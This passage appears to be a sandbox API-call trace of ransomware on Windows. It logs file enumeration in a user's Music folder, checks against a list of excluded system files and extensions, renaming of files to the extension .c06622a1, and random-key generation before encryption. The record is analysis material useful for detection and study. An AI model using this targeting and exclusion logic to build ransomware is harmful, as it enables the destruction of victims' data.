(_Str1="msc", _Str2="m4a") returned 63 [0160.229] wcslen (_String="msc") returned 0x3 [0160.229] _wcsicmp (_Str1="msp", _Str2="m4a") returned 63 [0160.229] wcslen (_String="msp") returned 0x3 [0160.229] _wcsicmp (_Str1="msstyles", _Str2="m4a") returned 63 [0160.229] wcslen (_String="msstyles") returned 0x8 [0160.229] _wcsicmp (_Str1="msu", _Str2="m4a") returned 63 [0160.229] wcslen (_String="msu") returned 0x3 [0160.229] _wcsicmp (_Str1="nls", _Str2="m4a") returned 1 [0160.229] wcslen (_String="nls") returned 0x3 [0160.229] _wcsicmp (_Str1="nomedia", _Str2="m4a") returned 1 [0160.229] wcslen (_String="nomedia") returned 0x7 [0160.229] _wcsicmp (_Str1="ocx", _Str2="m4a") returned 2 [0160.229] wcslen (_String="ocx") returned 0x3 [0160.229] _wcsicmp (_Str1="prf", _Str2="m4a") returned 3 [0160.229] wcslen (_String="prf") returned 0x3 [0160.229] _wcsicmp (_Str1="ps1", _Str2="m4a") returned 3 [0160.229] wcslen (_String="ps1") returned 0x3 [0160.230] _wcsicmp (_Str1="rom", _Str2="m4a") returned 5 [0160.230] wcslen (_String="rom") returned 0x3 [0160.230] _wcsicmp (_Str1="rtp", _Str2="m4a") returned 5 [0160.230] wcslen (_String="rtp") returned 0x3 [0160.230] _wcsicmp (_Str1="scr", _Str2="m4a") returned 6 [0160.230] wcslen (_String="scr") returned 0x3 [0160.230] _wcsicmp (_Str1="shs", _Str2="m4a") returned 6 [0160.230] wcslen (_String="shs") returned 0x3 [0160.230] _wcsicmp (_Str1="spl", _Str2="m4a") returned 6 [0160.230] wcslen (_String="spl") returned 0x3 [0160.230] _wcsicmp (_Str1="sys", _Str2="m4a") returned 6 [0160.230] wcslen (_String="sys") returned 0x3 [0160.230] _wcsicmp (_Str1="theme", _Str2="m4a") returned 7 [0160.230] wcslen (_String="theme") returned 0x5 [0160.230] _wcsicmp (_Str1="themepack", _Str2="m4a") returned 7 [0160.230] wcslen (_String="themepack") returned 0x9 [0160.230] _wcsicmp (_Str1="wpx", _Str2="m4a") returned 10 [0160.230] wcslen (_String="wpx") returned 0x3 [0160.230] _wcsicmp (_Str1="lock", _Str2="m4a") returned -1 [0160.230] wcslen (_String="lock") returned 0x4 [0160.230] _wcsicmp (_Str1="key", _Str2="m4a") returned -2 [0160.230] wcslen (_String="key") returned 0x3 [0160.230] _wcsicmp (_Str1="hta", _Str2="m4a") returned -5 [0160.230] wcslen (_String="hta") returned 0x3 [0160.230] _wcsicmp (_Str1="msi", _Str2="m4a") returned 63 [0160.230] wcslen (_String="msi") returned 0x3 [0160.230] _wcsicmp (_Str1="pdb", _Str2="m4a") returned 3 [0160.231] wcslen (_String="pdb") returned 0x3 [0160.231] _wcsicmp (_Str1="sqlite", _Str2="m4a") returned 6 [0160.231] wcslen (_String="sqlite") returned 0x6 [0160.231] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\lnixwvzg3uhvd9kw d q")) returned 0x10 [0160.231] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3272078 [0160.231] wcscpy (in: _Dest=0x3272078, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q" [0160.231] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q") returned 0x43 [0160.231] wcscpy (in: _Dest=0x3272100, _Source="adSqbHw.m4a" | out: _Dest="adSqbHw.m4a") returned="adSqbHw.m4a" [0160.231] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\adSqbHw.m4a", dwFileAttributes=0x80) returned 1 [0160.231] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\adSqbHw.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\lnixwvzg3uhvd9kw d q\\adsqbhw.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c4 [0160.231] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0160.232] ReadFile (in: hFile=0x1c4, lpBuffer=0x32e724, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32e7b4, lpOverlapped=0x0 | out: lpBuffer=0x32e724*, lpNumberOfBytesRead=0x32e7b4*=0x90, lpOverlapped=0x0) returned 1 [0160.232] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e724, Length=0x80) returned 0x55bdb1a1 [0160.232] RtlComputeCrc32 (PartialCrc=0xb1a1, Buffer=0x32e724, Length=0x80) returned 0xa3bc9674 [0160.232] RtlComputeCrc32 (PartialCrc=0x9674, Buffer=0x32e724, Length=0x80) returned 0x3fdbe650 [0160.232] RtlComputeCrc32 (PartialCrc=0xe650, Buffer=0x32e724, Length=0x80) returned 0x22050b79 [0160.232] RtlComputeCrc32 (PartialCrc=0xb79, Buffer=0x32e724, Length=0x80) returned 0xcde0af6f [0160.233] CloseHandle (hObject=0x1c4) returned 1 [0160.233] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3282080 [0160.233] wcscpy (in: _Dest=0x3282080, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\adSqbHw.m4a" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\adSqbHw.m4a") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\adSqbHw.m4a" [0160.233] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\adSqbHw.m4a") returned 0x4f [0160.233] wcscpy (in: _Dest=0x328211e, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0160.233] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\adSqbHw.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\lnixwvzg3uhvd9kw d q\\adsqbhw.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\adSqbHw.m4a.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\lnixwvzg3uhvd9kw d q\\adsqbhw.m4a.c06622a1"), dwFlags=0x8) returned 1 [0160.234] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\adSqbHw.m4a.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\lnixwvzg3uhvd9kw d q\\adsqbhw.m4a.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1c4 [0160.235] CreateIoCompletionPort (FileHandle=0x1c4, ExistingCompletionPort=0xd8, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 [0160.235] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x3990020 [0160.244] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4c5d5fb9 [0160.244] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x1e8bd8ad [0160.244] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x77a63c9 [0160.244] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x6ee1a59f [0160.244] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x512a4920 [0160.244] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x63cd33ee [0160.244] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4426c6fb [0160.244] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x6b676995 [0160.247] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3990094, Length=0x80) returned 0xfbbc6eaa [0160.247] RtlComputeCrc32 (PartialCrc=0x6eaa, Buffer=0x3990094, Length=0x80) returned 0xbb73200c [0160.247] RtlComputeCrc32 (PartialCrc=0x200c, Buffer=0x3990094, Length=0x80) returned 0x31997938 [0160.247] RtlComputeCrc32 (PartialCrc=0x7938, Buffer=0x3990094, Length=0x80) returned 0xcb83817d [0160.247] RtlComputeCrc32 (PartialCrc=0x817d, Buffer=0x3990094, Length=0x80) returned 0x6fa27d2b [0160.247] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3990020) returned 1 [0160.247] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3272078) returned 1 [0160.248] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3282080) returned 1 [0160.249] FindNextFileW (in: hFindFile=0x1541c8, lpFindFileData=0x32e89c | out: lpFindFileData=0x32e89c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ce90f40, ftCreationTime.dwHighDateTime=0x1d5d88b, ftLastAccessTime.dwLowDateTime=0x86ed7310, ftLastAccessTime.dwHighDateTime=0x1d5e6c2, ftLastWriteTime.dwLowDateTime=0x86ed7310, ftLastWriteTime.dwHighDateTime=0x1d5e6c2, nFileSizeHigh=0x0, nFileSizeLow=0xad9b, dwReserved0=0x0, dwReserved1=0x0, cFileName="AgAi2xVsC1tyl.mp3", cAlternateFileName="AGAI2X~1.MP3")) returned 1 [0160.249] _wcsicmp (_Str1="AgAi2xVsC1tyl.mp3", _Str2="README.c06622a1.TXT") returned -17 [0160.249] wcsstr (_Str="AgAi2xVsC1tyl.mp3", _SubStr="README") returned 0x0 [0160.249] _wcsicmp (_Str1="autorun.inf", _Str2="AgAi2xVsC1tyl.mp3") returned 14 [0160.250] wcslen (_String="autorun.inf") returned 0xb [0160.250] _wcsicmp (_Str1="boot.ini", _Str2="AgAi2xVsC1tyl.mp3") returned 1 [0160.250] wcslen (_String="boot.ini") returned 0x8 [0160.250] _wcsicmp (_Str1="bootfont.bin", _Str2="AgAi2xVsC1tyl.mp3") returned 1 [0160.250] wcslen (_String="bootfont.bin") returned 0xc [0160.250] _wcsicmp (_Str1="bootsect.bak", _Str2="AgAi2xVsC1tyl.mp3") returned 1 [0160.250] wcslen (_String="bootsect.bak") returned 0xc [0160.250] _wcsicmp (_Str1="desktop.ini", _Str2="AgAi2xVsC1tyl.mp3") returned 3 [0160.250] wcslen (_String="desktop.ini") returned 0xb [0160.250] _wcsicmp (_Str1="iconcache.db", _Str2="AgAi2xVsC1tyl.mp3") returned 8 [0160.250] wcslen (_String="iconcache.db") returned 0xc [0160.250] _wcsicmp (_Str1="ntldr", _Str2="AgAi2xVsC1tyl.mp3") returned 13 [0160.250] wcslen (_String="ntldr") returned 0x5 [0160.250] _wcsicmp (_Str1="ntuser.dat", _Str2="AgAi2xVsC1tyl.mp3") returned 13 [0160.250] wcslen (_String="ntuser.dat") returned 0xa [0160.250] _wcsicmp (_Str1="ntuser.dat.log", _Str2="AgAi2xVsC1tyl.mp3") returned 13 [0160.250] wcslen (_String="ntuser.dat.log") returned 0xe [0160.250] _wcsicmp (_Str1="ntuser.ini", _Str2="AgAi2xVsC1tyl.mp3") returned 13 [0160.250] wcslen (_String="ntuser.ini") returned 0xa [0160.250] _wcsicmp (_Str1="thumbs.db", _Str2="AgAi2xVsC1tyl.mp3") returned 19 [0160.250] wcslen (_String="thumbs.db") returned 0x9 [0160.250] _wcsicmp (_Str1="386", _Str2="mp3") returned -58 [0160.250] wcslen (_String="386") returned 0x3 [0160.250] _wcsicmp (_Str1="adv", _Str2="mp3") returned -12 [0160.250] wcslen (_String="adv") returned 0x3 [0160.250] _wcsicmp (_Str1="ani", _Str2="mp3") returned -12 [0160.250] wcslen (_String="ani") returned 0x3 [0160.251] _wcsicmp (_Str1="bat", _Str2="mp3") returned -11 [0160.251] wcslen (_String="bat") returned 0x3 [0160.251] _wcsicmp (_Str1="bin", _Str2="mp3") returned -11 [0160.251] wcslen (_String="bin") returned 0x3 [0160.251] _wcsicmp (_Str1="cab", _Str2="mp3") returned -10 [0160.251] wcslen (_String="cab") returned 0x3 [0160.251] _wcsicmp (_Str1="cmd", _Str2="mp3") returned -10 [0160.251] wcslen (_String="cmd") returned 0x3 [0160.251] _wcsicmp (_Str1="com", _Str2="mp3") returned -10 [0160.251] wcslen (_String="com") returned 0x3 [0160.251] _wcsicmp (_Str1="cpl", _Str2="mp3") returned -10 [0160.251] wcslen (_String="cpl") returned 0x3 [0160.251] _wcsicmp (_Str1="cur", _Str2="mp3") returned -10 [0160.251] wcslen (_String="cur") returned 0x3 [0160.251] _wcsicmp (_Str1="deskthemepack", _Str2="mp3") returned -9 [0160.251] wcslen (_String="deskthemepack") returned 0xd [0160.251] _wcsicmp (_Str1="diagcab", _Str2="mp3") returned -9 [0160.251] wcslen (_String="diagcab") returned 0x7 [0160.251] _wcsicmp (_Str1="diagcfg", _Str2="mp3") returned -9 [0160.251] wcslen (_String="diagcfg") returned 0x7 [0160.251] _wcsicmp (_Str1="diagpkg", _Str2="mp3") returned -9 [0160.251] wcslen (_String="diagpkg") returned 0x7 [0160.251] _wcsicmp (_Str1="dll", _Str2="mp3") returned -9 [0160.251] wcslen (_String="dll") returned 0x3 [0160.251] _wcsicmp (_Str1="drv", _Str2="mp3") returned -9 [0160.251] wcslen (_String="drv") returned 0x3 [0160.251] _wcsicmp (_Str1="exe", _Str2="mp3") returned -8 [0160.251] wcslen (_String="exe") returned 0x3 [0160.252] _wcsicmp (_Str1="hlp", _Str2="mp3") returned -5 [0160.252] wcslen (_String="hlp") returned 0x3 [0160.252] _wcsicmp (_Str1="icl", _Str2="mp3") returned -4 [0160.252] wcslen (_String="icl") returned 0x3 [0160.252] _wcsicmp (_Str1="icns", _Str2="mp3") returned -4 [0160.252] wcslen (_String="icns") returned 0x4 [0160.252] _wcsicmp (_Str1="ico", _Str2="mp3") returned -4 [0160.252] wcslen (_String="ico") returned 0x3 [0160.252] _wcsicmp (_Str1="ics", _Str2="mp3") returned -4 [0160.252] wcslen (_String="ics") returned 0x3 [0160.252] _wcsicmp (_Str1="idx", _Str2="mp3") returned -4 [0160.252] wcslen (_String="idx") returned 0x3 [0160.252] _wcsicmp (_Str1="ldf", _Str2="mp3") returned -1 [0160.252] wcslen (_String="ldf") returned 0x3 [0160.252] _wcsicmp (_Str1="lnk", _Str2="mp3") returned -1 [0160.252] wcslen (_String="lnk") returned 0x3 [0160.252] _wcsicmp (_Str1="mod", _Str2="mp3") returned -1 [0160.252] wcslen (_String="mod") returned 0x3 [0160.252] _wcsicmp (_Str1="mpa", _Str2="mp3") returned 46 [0160.252] wcslen (_String="mpa") returned 0x3 [0160.252] _wcsicmp (_Str1="msc", _Str2="mp3") returned 3 [0160.252] wcslen (_String="msc") returned 0x3 [0160.252] _wcsicmp (_Str1="msp", _Str2="mp3") returned 3 [0160.252] wcslen (_String="msp") returned 0x3 [0160.252] _wcsicmp (_Str1="msstyles", _Str2="mp3") returned 3 [0160.252] wcslen (_String="msstyles") returned 0x8 [0160.252] _wcsicmp (_Str1="msu", _Str2="mp3") returned 3 [0160.252] wcslen (_String="msu") returned 0x3 [0160.252] _wcsicmp (_Str1="nls", _Str2="mp3") returned 1 [0160.253] wcslen (_String="nls") returned 0x3 [0160.253] _wcsicmp (_Str1="nomedia", _Str2="mp3") returned 1 [0160.253] wcslen (_String="nomedia") returned 0x7 [0160.253] _wcsicmp (_Str1="ocx", _Str2="mp3") returned 2 [0160.253] wcslen (_String="ocx") returned 0x3 [0160.253] _wcsicmp (_Str1="prf", _Str2="mp3") returned 3 [0160.253] wcslen (_String="prf") returned 0x3 [0160.253] _wcsicmp (_Str1="ps1", _Str2="mp3") returned 3 [0160.253] wcslen (_String="ps1") returned 0x3 [0160.253] _wcsicmp (_Str1="rom", _Str2="mp3") returned 5 [0160.253] wcslen (_String="rom") returned 0x3 [0160.253] _wcsicmp (_Str1="rtp", _Str2="mp3") returned 5 [0160.253] wcslen (_String="rtp") returned 0x3 [0160.253] _wcsicmp (_Str1="scr", _Str2="mp3") returned 6 [0160.253] wcslen (_String="scr") returned 0x3 [0160.253] _wcsicmp (_Str1="shs", _Str2="mp3") returned 6 [0160.253] wcslen (_String="shs") returned 0x3 [0160.253] _wcsicmp (_Str1="spl", _Str2="mp3") returned 6 [0160.253] wcslen (_String="spl") returned 0x3 [0160.253] _wcsicmp (_Str1="sys", _Str2="mp3") returned 6 [0160.253] wcslen (_String="sys") returned 0x3 [0160.253] _wcsicmp (_Str1="theme", _Str2="mp3") returned 7 [0160.253] wcslen (_String="theme") returned 0x5 [0160.253] _wcsicmp (_Str1="themepack", _Str2="mp3") returned 7 [0160.253] wcslen (_String="themepack") returned 0x9 [0160.253] _wcsicmp (_Str1="wpx", _Str2="mp3") returned 10 [0160.253] wcslen (_String="wpx") returned 0x3 [0160.253] _wcsicmp (_Str1="lock", _Str2="mp3") returned -1 [0160.253] wcslen (_String="lock") returned 0x4 [0160.254] _wcsicmp (_Str1="key", _Str2="mp3") returned -2 [0160.254] wcslen (_String="key") returned 0x3 [0160.254] _wcsicmp (_Str1="hta", _Str2="mp3") returned -5 [0160.254] wcslen (_String="hta") returned 0x3 [0160.254] _wcsicmp (_Str1="msi", _Str2="mp3") returned 3 [0160.254] wcslen (_String="msi") returned 0x3 [0160.254] _wcsicmp (_Str1="pdb", _Str2="mp3") returned 3 [0160.254] wcslen (_String="pdb") returned 0x3 [0160.254] _wcsicmp (_Str1="sqlite", _Str2="mp3") returned 6 [0160.254] wcslen (_String="sqlite") returned 0x6 [0160.254] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\lnixwvzg3uhvd9kw d q")) returned 0x10 [0160.254] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3272078 [0160.254] wcscpy (in: _Dest=0x3272078, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q" [0160.254] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q") returned 0x43 [0160.254] wcscpy (in: _Dest=0x3272100, _Source="AgAi2xVsC1tyl.mp3" | out: _Dest="AgAi2xVsC1tyl.mp3") returned="AgAi2xVsC1tyl.mp3" [0160.254] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\AgAi2xVsC1tyl.mp3", dwFileAttributes=0x80) returned 1 [0160.255] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\AgAi2xVsC1tyl.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\lnixwvzg3uhvd9kw d q\\agai2xvsc1tyl.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a0 [0160.255] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0160.255] ReadFile (in: hFile=0x1a0, lpBuffer=0x32e724, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32e7b4, lpOverlapped=0x0 | out: lpBuffer=0x32e724*, lpNumberOfBytesRead=0x32e7b4*=0x90, lpOverlapped=0x0) returned 1 [0160.256] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e724, Length=0x80) returned 0xf574f98c [0160.256] RtlComputeCrc32 (PartialCrc=0xf98c, Buffer=0x32e724, Length=0x80) returned 0x35b93c24 [0160.256] RtlComputeCrc32 (PartialCrc=0x3c24, Buffer=0x32e724, Length=0x80) returned 0xb70775a8 [0160.256] RtlComputeCrc32 (PartialCrc=0x75a8, Buffer=0x32e724, Length=0x80) returned 0x12b73ea4 [0160.256] RtlComputeCrc32 (PartialCrc=0x3ea4, Buffer=0x32e724, Length=0x80) returned 0x337f810a [0160.256] CloseHandle (hObject=0x1a0) returned 1 [0160.256] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3282080 [0160.256] wcscpy (in: _Dest=0x3282080, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\AgAi2xVsC1tyl.mp3" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\AgAi2xVsC1tyl.mp3") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\AgAi2xVsC1tyl.mp3" [0160.256] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\AgAi2xVsC1tyl.mp3") returned 0x55 [0160.256] wcscpy (in: _Dest=0x328212a, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0160.256] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\AgAi2xVsC1tyl.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\lnixwvzg3uhvd9kw d q\\agai2xvsc1tyl.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\AgAi2xVsC1tyl.mp3.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\lnixwvzg3uhvd9kw d q\\agai2xvsc1tyl.mp3.c06622a1"), dwFlags=0x8) returned 1 [0160.258] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\AgAi2xVsC1tyl.mp3.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\lnixwvzg3uhvd9kw d q\\agai2xvsc1tyl.mp3.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1a0 [0160.258] CreateIoCompletionPort (FileHandle=0x1a0, ExistingCompletionPort=0x130, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x130 [0160.259] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x3a20020 [0160.267] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x3170e33f [0160.267] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5ee24d47 [0160.267] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x1adb34de [0160.267] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x1c0aa718 [0160.267] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x279f99c6 [0160.267] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x12840d9 [0160.267] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x6f037c7d [0160.267] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x3bb81482 [0160.270] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3a20094, Length=0x80) returned 0x6eb88fff [0160.270] RtlComputeCrc32 (PartialCrc=0x8fff, Buffer=0x3a20094, Length=0x80) returned 0x2b871f46 [0160.270] RtlComputeCrc32 (PartialCrc=0x1f46, Buffer=0x3a20094, Length=0x80) returned 0xb6477878 [0160.271] RtlComputeCrc32 (PartialCrc=0x7878, Buffer=0x3a20094, Length=0x80) returned 0x3faedaa2 [0160.271] RtlComputeCrc32 (PartialCrc=0xdaa2, Buffer=0x3a20094, Length=0x80) returned 0x5f8ea48 [0160.271] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3a20020) returned 1 [0160.271] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3272078) returned 1 [0160.272] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3282080) returned 1 [0160.273] FindNextFileW (in: hFindFile=0x1541c8, lpFindFileData=0x32e89c | out: lpFindFileData=0x32e89c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa859f2c0, ftCreationTime.dwHighDateTime=0x1d5e7bd, ftLastAccessTime.dwLowDateTime=0x3521a260, ftLastAccessTime.dwHighDateTime=0x1d5dcac, ftLastWriteTime.dwLowDateTime=0x3521a260, ftLastWriteTime.dwHighDateTime=0x1d5dcac, nFileSizeHigh=0x0, nFileSizeLow=0x863f, dwReserved0=0x0, dwReserved1=0x0, cFileName="PS5Jm19.m4a", cAlternateFileName="")) returned 1 [0160.273] _wcsicmp (_Str1="PS5Jm19.m4a", _Str2="README.c06622a1.TXT") returned -2 [0160.273] wcsstr (_Str="PS5Jm19.m4a", _SubStr="README") returned 0x0 [0160.273] _wcsicmp (_Str1="autorun.inf", _Str2="PS5Jm19.m4a") returned -15 [0160.273] wcslen (_String="autorun.inf") returned 0xb [0160.273] _wcsicmp (_Str1="boot.ini", _Str2="PS5Jm19.m4a") returned -14 [0160.273] wcslen (_String="boot.ini") returned 0x8 [0160.273] _wcsicmp (_Str1="bootfont.bin", _Str2="PS5Jm19.m4a") returned -14 [0160.273] wcslen (_String="bootfont.bin") returned 0xc [0160.273] _wcsicmp (_Str1="bootsect.bak", _Str2="PS5Jm19.m4a") returned -14 [0160.273] wcslen (_String="bootsect.bak") returned 0xc [0160.273] _wcsicmp (_Str1="desktop.ini", _Str2="PS5Jm19.m4a") returned -12 [0160.273] wcslen (_String="desktop.ini") returned 0xb [0160.273] _wcsicmp (_Str1="iconcache.db", _Str2="PS5Jm19.m4a") returned -7 [0160.273] wcslen (_String="iconcache.db") returned 0xc [0160.273] _wcsicmp (_Str1="ntldr", _Str2="PS5Jm19.m4a") returned -2 [0160.274] wcslen (_String="ntldr") returned 0x5 [0160.274] _wcsicmp (_Str1="ntuser.dat", _Str2="PS5Jm19.m4a") returned -2 [0160.274] wcslen (_String="ntuser.dat") returned 0xa [0160.274] _wcsicmp (_Str1="ntuser.dat.log", _Str2="PS5Jm19.m4a") returned -2 [0160.274] wcslen (_String="ntuser.dat.log") returned 0xe [0160.274] _wcsicmp (_Str1="ntuser.ini", _Str2="PS5Jm19.m4a") returned -2 [0160.274] wcslen (_String="ntuser.ini") returned 0xa [0160.274] _wcsicmp (_Str1="thumbs.db", _Str2="PS5Jm19.m4a") returned 4 [0160.274] wcslen (_String="thumbs.db") returned 0x9 [0160.274] _wcsicmp (_Str1="386", _Str2="m4a") returned -58 [0160.274] wcslen (_String="386") returned 0x3 [0160.274] _wcsicmp (_Str1="adv", _Str2="m4a") returned -12 [0160.274] wcslen (_String="adv") returned 0x3 [0160.274] _wcsicmp (_Str1="ani", _Str2="m4a") returned -12 [0160.274] wcslen (_String="ani") returned 0x3 [0160.274] _wcsicmp 